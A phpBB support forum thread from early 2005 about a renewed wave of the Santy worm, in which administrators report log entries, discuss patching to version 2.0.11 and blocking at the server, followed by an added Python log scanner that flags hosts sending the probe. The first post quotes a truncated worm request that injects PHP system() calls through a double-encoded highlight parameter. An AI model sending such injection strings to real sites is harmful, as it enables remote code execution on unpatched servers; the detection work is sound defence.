Um, santy is back?

Hynee
Registered User
Posts: 21
Joined: Sat Dec 25, 2004 6:58 am

Post by Hynee »

About an hour ago a user on my forum pointed out that there were 130 guests on our board, and sure enough, they were the usual:

/forum/viewtopic.php?t=546&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(

The user agent is always a simple "Mozilla/4.0", not your typical real browser string of "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", and not the user agent the Christmas santy used (LWP::Simple or lwp-trivial). They've obviously changed this, because that made it easy to catch.

They're coming from all sorts of hosts. Anyway, is it back?
fumbalah
Registered User
Posts: 2000
Joined: Sat Jan 24, 2004 3:02 pm
Location: Lexington, Kentucky

Post by fumbalah »

What version of phpBB are you running? The worm is still going around somewhat, trying to exploit forums; as long as you are patched, you should be fine.
Hynee
Registered User
Posts: 21
Joined: Sat Dec 25, 2004 6:58 am

Post by Hynee »

We're fine, we're at v2.0.11. Just a lot of hits, hasn't slowed us really.
tristatesportbikes
Registered User
Posts: 14
Joined: Tue Jun 15, 2004 12:54 am

hits

Post by tristatesportbikes »

We were hit with over 500 guests and it didn't slow it down at all. The patches seem to be working fine. Put the patch in the config.php file and guests dropped down to normal.

We are at a heavily modded board that is at 2.0.6 with all of the security patches from then to 2.0.11.
G.A. Heath
Registered User
Posts: 2
Joined: Tue Jan 25, 2005 2:32 am

Post by G.A. Heath »

I have to agree that this is a new flavor of santy. My site is small, but we have noticed the activity and my logs are similar to what Hynee has mentioned.
mdecatur
Registered User
Posts: 2
Joined: Fri Dec 24, 2004 9:56 pm

Post by mdecatur »

We're getting slaughtered, hundreds of guests and our board is crawling. We're at 2.0.11 though, so security is a nonissue. Is there a way to ban the hosts that try to execute this specific URL string automatically?
AdamR
Former Team Member
Posts: 9731
Joined: Tue Mar 02, 2004 5:40 pm
Location: Tampa, Florida
Name: Adam Reyher

Post by AdamR »

You can block the attacks at the "server" level before it even gets to the phpBB files. See this link for information:
http://www.phpbb.com/phpBB/viewtopic.php?t=249010

- Adam
"If I have seen a little further it is by standing on the shoulders of Giants." - Isaac Newton
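
On mdecatur's question about finding the hosts that send this URL, an added example (not part of the original thread and not phpBB code): it scans access-log lines for the double-encoded `highlight=` value quoted in the first post, where `%2527` decodes to `%27` and then to a quote, and counts hits per host. The Apache combined log format, the sample lines and the function names are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, unquote

# Apache "combined" log line: client host, request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
BARE_UA = "Mozilla/4.0"  # the agent string reported in the thread

def is_probe(url):
    """True if viewtopic.php's highlight= hides a quote behind double URL encoding."""
    parts = urlsplit(url)
    if not parts.path.endswith("viewtopic.php"):
        return False
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        if name == "highlight":
            once = unquote(raw)  # value after the single decode PHP applies to GET data
            return "'" not in once and "'" in unquote(once)
    return False

def ban_candidates(lines):
    """Map each probing host to (probe count, probes sent with the bare agent)."""
    probes, bare = Counter(), Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_probe(m["url"]):
            probes[m["host"]] += 1
            bare[m["host"]] += m["ua"] == BARE_UA
    return {host: (n, bare[host]) for host, n in probes.items()}

# Constructed sample lines (documentation IP ranges). The query string is the
# truncated one quoted in the thread, left truncated.
PROBE = "/forum/viewtopic.php?t=546&highlight=%2527%252Esystem(chr(112)%252Echr(101)"
MSIE = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
SAMPLE_LOG = [
    f'192.0.2.10 - - [25/Jan/2005:02:10:01 +0000] "GET {PROBE} HTTP/1.0" 200 512 "-" "{BARE_UA}"',
    f'192.0.2.10 - - [25/Jan/2005:02:10:03 +0000] "GET {PROBE} HTTP/1.0" 200 512 "-" "{BARE_UA}"',
    f'198.51.100.7 - - [25/Jan/2005:02:10:04 +0000] "GET {PROBE} HTTP/1.0" 200 512 "-" "{MSIE}"',
    f'203.0.113.5 - - [25/Jan/2005:02:10:05 +0000] "GET /forum/viewtopic.php?t=546&highlight=santy HTTP/1.1" 200 9041 "-" "{MSIE}"',
    f'203.0.113.9 - - [25/Jan/2005:02:10:06 +0000] "GET /forum/index.php HTTP/1.0" 200 7020 "-" "{BARE_UA}"',
]

if __name__ == "__main__":
    for host, (n, bare_n) in sorted(ban_candidates(SAMPLE_LOG).items()):
        print(f"{host}: {n} probe(s), {bare_n} with bare agent")
```

Matching on the URL rather than the agent string keeps working if the agent changes again, as it did between the two waves described in the first post.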